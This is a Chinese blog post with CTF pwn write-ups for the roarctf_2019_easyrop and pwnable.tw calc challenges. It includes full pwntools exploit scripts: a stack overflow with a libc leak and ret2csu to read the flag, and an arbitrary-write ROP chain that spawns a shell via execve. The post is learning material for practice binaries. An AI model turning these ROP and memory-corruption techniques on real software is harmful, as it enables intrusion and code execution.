【PWN刷题】Pwnable-calc、Buu-roarctf_2019_easyrop

已于 2023-05-06 00:09:37 修改
阅读量1.5k 收藏 12
点赞数 18
分类专栏: Pwn刷题之路 文章标签: 安全 网络安全
于 2023-05-06 00:08:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QYbudong/article/details/130494767
版权

题目来源:https://pwnable.tw/challenge

前言

今天事略多,做一道pwnable+一道有分的buu吧

一、Buu-roarctf_2019_easyrop

1.检查保护

开了NX和RELRO,没开Canary和PIE;再查看被禁用的系统调用,标准的orw题目

2.IDA分析

①双击main函数,v5存在明显的栈溢出,while循环并没有检测输入的次数,我们可以覆盖掉ret形成rop链。

 ②再看看sub_401678函数,这个函数会把我们输入的文件名,输出权限用户等信息,不过我们在main函数已经有了栈溢出,所以这个函数没什么用。

 ③思路:1.由于我们是使用数组来覆写数据,所以要先控制数组下标,这里v3的值来源于v8。所以我们在写入0x418个a后,要把接下来的v8覆写为0x428,直接写入\x28即可。接下来再写入的值,就会写到v5[0x428]处,也就是ret地址。

 2.接着,我们要泄露libc,一套puts小妙招,泄露两个got地址,到libc.rip下载对应libc 2.27。

payload = b'a' * 0x418 + b'\x28'
payload += p64(0x401b93) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x4019f3)

 3.找了一圈,发现没有pop rdx;ret,所以需要ret2csu了。我们利用下方六个pop可以控制r12~r15,r13~r15放三个参数,r12放函数指针。函数地址我们要写到bss段当成指针用,选用0x06030C0作为bss地址。也可以选用0x06031C0,不过要离栈顶远一点。

 4.实现:先将flag\x00写到bss0上==>将open写到bss1上,利用csu调用bss1的open打开flag=>将read写到bss1上,利用csu调用bss1的read写到bss2上=>将write写到bss1上,利用csu调用bss1的write把flag写到标准输出上。

5.想起来之前做过的一道题,参考文章如下,也可以通过mprotect修改栈权限,将PROT_EXEC关闭,执行shellcode读取flag。

int mprotect(void *addr, size_t len, int prot);

pwn刷题num30----栈溢出修改栈上参数 或 mprotect修改内存权限 + ret2shellcode_tbsqigongzi的博客-CSDN博客BUUCTF-PWN-get_started_3dsctf_2016首先查保护–>看链接类型–>赋予程序可执行权限–>试运行32位程序,小端序开启部分RELRO-----got表仍可写未开启canary保护-----存在栈溢出开启NX保护-----堆栈不可执行未开启PIE-----程序地址为真实地址静态链接Qual a palavrinha magica?中文意思是什么是神奇的词?很奇怪,ida看一下伪代码栈溢出,gets函数输入字符串给v4,未限制输入的https://blog.csdn.net/tbsqigongzi/article/details/124457938

3.EXP

from pwn import *
from LibcSearcher import *
context(arch = "amd64", os = "linux", log_level = "debug")


#p = process('./roarctf_2019_easyrop')
p = remote('node4.buuoj.cn', 29281)
elf = ELF('./roarctf_2019_easyrop')
libc=ELF('./libc6_2.27.so')
#gdb.attach(p, '')

pop_rdi = 0x0000000000401b93
pop_rsi_r15 = 0x0000000000401b91
main = 0x4019f3
csu_pop = 0x0401B8A
csu_call = 0x0401B70

def ret2csu(funP,a1,a2,a3):
	p.recvuntil('>>')
	payload = b'a' * 0x418 + b'\x28'
	payload += p64(csu_pop) + p64(0)+ p64(1) + p64(funP) + p64(a1) + p64(a2) + p64(a3) 
	payload += p64(csu_call) + b'A'*56 + p64(main)
	p.sendline(payload)
	

#-----------------------------------leaklibc----------------------------------
p.recvuntil('>>')
payload = b'a' * 0x418 + b'\x28'
payload += p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(main)
p.sendline(payload)
p.recvuntil("\n\x00")
libc_puts = u64(p.recv(6).ljust(8,b'\x00'))
print(libc_puts)

#------------------------------------orw_libc---------------------------------
libc_base=libc_puts-libc.symbols["puts"]
#print(libc_base)
libc_open=libc.symbols["open"]+libc_base	#open
libc_read=libc.symbols["read"]+libc_base	#read
libc_write=libc.symbols["write"]+libc_base	#write
#print(libc_open)
#-----------------------------------openfile----------------------------------
p.recvuntil('>>')
p1=b'a' * 0x418 + b'\x28' + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x06030C0) + p64(0) + p64(libc_read) + p64(main)
p.sendline(p1)
p.sendline(b'flag\x00')#flag=>0x06030C0

p.recvuntil('>>')
p1=b'a' * 0x418 + b'\x28' + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x06030C8) + p64(0) + p64(libc_read) + p64(main)
p.sendline(p1)
p.sendline(p64(libc_open))#libc_open=>0x06030C8
ret2csu(0x06030C8,0x06030C0,0,0)

#-----------------------------------readflag---------------------------------
p.recvuntil('>>')
p1=b'a' * 0x418 + b'\x28' + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x06030C8) + p64(0) + p64(libc_read) + p64(main)
p.sendline(p1)
p.sendline(p64(libc_read))

ret2csu(0x6030C8,3,0x06041C0,0x50)

#-----------------------------------writeflag----------------------------------
p.recvuntil('>>')
p1=b'a' * 0x418 + b'\x28' + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x06030C8) + p64(0) + p64(libc_read) + p64(main)
p.sendline(p1)
p.sendline(p64(libc_write))

ret2csu(0x6030C8,2,0x06041C0,0x50)


p.interactive()

二、Pwnable-calc

1.检查保护

开了NX和Canary,可能需要泄露Canary或者任意地址写

2.IDA分析

①双击calc(),发现parse_expr是处理输入和运算的函数。在第32行的if循环,a2[0]中存放着操作数栈大小,从a2[1]开始存放操作数。

 ②其中,eval函数会通过res操作数栈和op操作符执行对应的计算,并且把结果保存到res[res[0]-1]中。res[0]是我们上边说到的操作数栈大小,也就是有多少个数。如果我们可以控制res[0],就可以做到任意地址读写。当我们只输入第二个操作数时,再执行eval计算会出现res[1-1]+=res[1],成功篡改了res[0]。这时,我们直接输入+100+10,就可以把res[100]的地方加上10。

 ③思路:泄露栈地址==>覆盖ret,在原地址存的值加上与我们想修改值的差==>ROP链getshell

 3.EXP

#!/usr/bin/env python3
# coding = utf-8

from pwn import *
context(arch = "i386", os = "linux", log_level = "debug")

#p = process('./calc')
p = remote('chall.pwnable.tw',10100)
#gdb.attach(p, '')

p.recvuntil('===')
p.sendline(b'+360')
p.recv()
binsh_addr = int(p.recv())


eax=0x0805c34b
edx_ecx_ebx=0x080701d1
int80=0x08049a21


add_address = [eax,0xb,edx_ecx_ebx,0,0,binsh_addr,int80,0x6e69622f,0x0068732f]


for i in range(len(add_address)):
    p.sendline("+"+str(361+i))
    num = int(p.recvline())
    
    add_num = add_address[i] - num
    if add_num > 0 :
        p.sendline("+"+str(361+i)+"+"+str(add_num))
        p.recvline()
    else:
        p.sendline("+"+str(361+i)+str(add_num))
        p.recvline()


p.interactive()

QY不懂
关注
  • 18
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pwn】NCTF2019 easy_rop
Nothing
12-03 1117
查看程序保护。 分析程序,程序只有一个main函数。 v6距离rbp为0x70,在输入数字的时候可以输34 * 4个字节的数,34*4-0x70=24,意味着可以溢出覆盖rbp,ret_address,以及返回地址下面的8个字节。main函数的old_rbp值实际上是代码段init的地址,返回地址位置是libc中的一个地址。scanf函数%d当输入为’+'时不会改变原内存中数据,于是可以来泄露代...
BUUCTF-PWN roarctf_2019_easyheap(double free, stdout重定向)
weixin_44145820的博客
04-23 780
这里写目录标题题目分析漏洞利用Exp 题目分析 有添加,删除,展示三个主要功能,不过添加有次数限制,同时限制了申请大小,使得我们不能申请出unsorted bin范围内的chunk 删除之后没有置空,可以多次free show功能有条件限制,而且会把stdout关了 添加和后门的次数 后门函数可以进行calloc和free,同样没有置空,但是后门函数的次数限制逻辑有问题,即使为0还会再...
RoarCTF2019web题-easy_java writeup
silencediors的博客
10-16 6625
RoarCTF2019web题-easy_java 作为团队最强的web选手(就我一个),这次的比赛也没时间打,把简单的题放一下,前面要说下,做web宁可把题目想简单,也不要想复杂,因为现在的web题出题人越来越厉害(gou)(怀念以前查看源码就得flag的时代),出题的把握可能也没那么好,思维多次引导的话就可能走岔路,就像这题我开始一直在想反序列化和upload流上传的事,甚至是tomcat那个...
roarctf_2019_easy_pwn
z1r0的博客
12-24 557
roarctf_2019_easy_pwn 查看保护 这里有一个off-by-one a2比a1大10就会有一个溢出。overlapping+fastbin attack即可getshell。发现one_gadget打不通,用realloc来调整栈即可打通 具体的overlapping + fastbin attack看z1r0’s blog吧。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_
pwnable.tw-calc详解
qq_35661990的博客
01-06 933
重点需要的知识:ROP链的构造、栈中ebp和esp的变换 这题颠覆了我原本以为pwn都是各种套路的思想,和pwn只需要关注危险函数的思想,栈溢出并不是只有各种ret技术,恐怕堆溢出也不仅仅局限于各种heap of技术,那些只是基础。 int __cdecl main(int argc, const char **argv, const char **envp) { ssignal(14,...
pwnable.tw calc 经验总结
qq_43189757的博客
10-22 751
代码写的少, 弄清楚程序逻辑都得盯好久… 程序逻辑: 如题目名字所写, 程序的功能就是实现一个简单计算器的功能 相关函数介绍: 1.get_expr 函数功能为读取计算的表达式, 运算符只包括+ , - , *, /, %五种, 除了运算符和参加运算的数据之外的字符都不会被读取 2.parse_expr 函数功能为对表达式进行解析 传入的参数a1 为表达式的地址 a2 为calc函数中变量v...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwnroarctf_2019_realloc_magic
Nothing
03-05 1012
例行检查 保护全开,分析程序逻辑。发现没有输出堆内容的函数,想要泄露libc地址只能通过修改IO_FILE结构体实现。realloc函数有两个trick。在size为0时,free掉指针指向的堆块,返回0;在分配超过当前指针指向堆块大小时如果有剩余空间则扩大堆块大小。 利用思路 1.堆块free 8次放进unsortbin中,在fd上得到arena地址,通过realloc扩大堆块的特性造成堆块堆叠...
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)
weixin_44145820的博客
04-17 1946
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
萌新学pwn-roarctf_2019_easy_pwn
qq_36495104的博客
06-28 569
roarctf_2019_easy_pwn 安全检查 可以劫持malloc_hook ida查看 main __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int choice; // [rsp+4h] [rbp-Ch] __int64 savedregs; // [rsp+10h] [rbp+0h] setvbuf_3(); while ( 1 ) { menue(); choice = rea
攻防世界PWNcalc2题解
seaaseesa的博客
12-12 1085
calc2 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,发现libc被静态编译进了程序中,又由于没有开启PIE,,所以,我们就直接可以获得需要的函数的地址。然而,我们发现,system、execve这些函数都没有,有没有one_gadget,那么我们只能通过系统调用来构造ROP执行/bin/sh来getshell 发现,该程序是一个四则运算表达式计算程序 其中,我...
easyROPtocol
u014377094的博客
03-05 197
感觉重点在构造,但其实跑起来试试就逝世。拉锯数小时,beng bu zhu le。 官方wp传送门VNCTF 2022 Official WriteUp.pdf (tonycrane.cc) 打开main,里面123对应着创建删除运行。 重点在1里 第二个if如果不满足就会删除 v1里 决定了前4位的数(如果选择两个一起放,记得处理小端序),后面则告诉我们几位不能为0几位必须为0,12里非5即6 第二个里是个^。先去处理第一个,第二个再处理。 struct message { .
jarvis oj pwn calc.exe writeup
charlie_heng的专栏
02-19 504
这题其实难是难在代码比较多,要审计比较长时间 首先checksec,发现没开NX,估计就是要用shellcode了 然后审计了一波,粗略发现了两个漏洞 1. 没有检查calloc出来那几个堆是否满了,有可能会溢出到下一个堆,但是这里用不了,所以不详细说了 2. 使用var ,可以添加add sub等已经存在的函数,从而实现替代了函数功能的作用 这里用的就是第二个漏洞 var add =...
[BUUCTF-pwn] simple_calc_2016
weixin_52640415的博客
12-14 321
先看漏点: 正常情况下,5退出直接return 0或者free再return就行了,这里还有个memcpy,v29是堆指针,v26在栈内。v26的定义是rbp-40h 64位系统写8个qword就到一般rbp后边就是ret而允许写的数是0x100/2个,明显的溢出,只需要写9个然后写rop即可。 char v26[40]; // [rsp+10h] [rbp-40h] BYREF ....... case 1: adds((__int64)"%d", ...
pwnable.tw calc writeup
jmp esp
09-27 1649
题目main:int __cdecl main(int argc, const char **argv, const char **envp) { ssignal(14, timeout); alarm(60); puts("=== Welcome to SECPROG calculator ==="); fflush(stdout); calc(); return puts
mrctf2020_easyrop
z1r0的博客
04-10 370
mrctf2020_easyrop 查看保护 简单题 用hehe和byby这两个函数配合起来rop就行 from pwn import * from time import sleep context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1
boston-key-party-2016-pwn-simple_calc 题解
lifanxin的博客
02-18 486
Write Up文件信息漏洞定位利用分析wp总结 文件信息 该样本来自2016年boston-key-party ctf的一道pwn题–simple_calc 检查样本信息:   只开启了NX保护,64位小端程序 漏洞定位 将样本拖入IDA进行分析时,会发现text段特别多,仔细分析后会发现很多函数都没有被使用,写完wp后,我猛然发现引用这么多看似无用的text段,其实是为了引用更多的gadget,方便后面ROP链的构造。好的,废话不多说,进行漏洞分析。 分析main函数,可以发现该样本是一个菜单题,先要
XSCTF联合招新赛(热身赛)babystack & easyrop
最新发布
红叶的博客
10-29 1916
开启了栈不可执行,但是在 IDA Pro 中发现了backdoor函数。
2022 VNCTF easyROPtocol
weixin_46483787的博客
04-09 1801
一道协议逆向+orwROP的题,基本上难度在于给出符合要求的协议头和校验和 拿到题目: 在打印的信息中我们可以获取到,这个程序是TCP protocol的C语言实现 于是先把TCP的头部结构拿过来: 首先进add函数里看看: 可以看到能够申请最多4个chunk,每个chunk最多0x1000 生成之后要通过check_head函数和check_sum的检测 首先看check_head: 从这里可以得到确定一些头部信息,如源端口和目的端口,还有urgent_ptr必须为0,等,还有一些属性只能缩小范围,
CTF刷题笔记:whitegive_pwn漏洞分析与plt/got表利用
本笔记记录了作者在CTFCapture The Flag)比赛中的刷题经验,特别关注于一道名为"whitegive_pwn"的挑战。该题目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值